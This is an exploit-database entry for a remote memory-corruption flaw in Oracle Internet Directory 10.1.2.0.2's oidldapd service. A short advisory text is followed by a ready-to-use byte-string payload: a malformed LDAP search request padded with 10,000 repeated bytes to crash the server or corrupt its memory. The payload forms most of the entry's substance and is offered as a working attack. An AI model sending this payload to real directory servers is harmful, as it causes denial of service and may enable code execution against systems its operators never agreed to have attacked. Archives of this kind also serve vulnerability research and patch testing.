Oracle Internet Directory 10.1.2.0.2 - 'oidldapd' Remote Memory Corruption

EDB-ID:

33532

CVE:

N/A


Author:

Intevydis

Type:

dos


Platform:

Multiple

Date:

2006-11-10


source: https://www.securityfocus.com/bid/37833/info

Oracle Internet Directory is prone to a remote memory-corruption vulnerability.

Exploits may allow attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in denial-of-service conditions.

Oracle Internet Directory 10.1.2.0.2 is vulnerable; other versions may also be affected.

NOTE: This issue may be a duplicate of an existing BID and may have already been addressed by the vendor. We will update the BID if more information emerges.

s ="\x30\x82\x27\x4a\x02\x01\x01\x63\x82\x27\x43\x04\x00\x0a\x01\x02"
s+="\x0a\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa4\x82\x27\x2e"
s+="\x04\x04\x6d\x61\x69\x6c\x30\x82\x27\x24\x80\x04\x66\x6f\x6f\x40"
s+="\x81\x04\x75\x6e\x69\x76"
s+="\x82"*10000
s+="\x82\x06\x6d\x75\x6e\x69\x63\x68"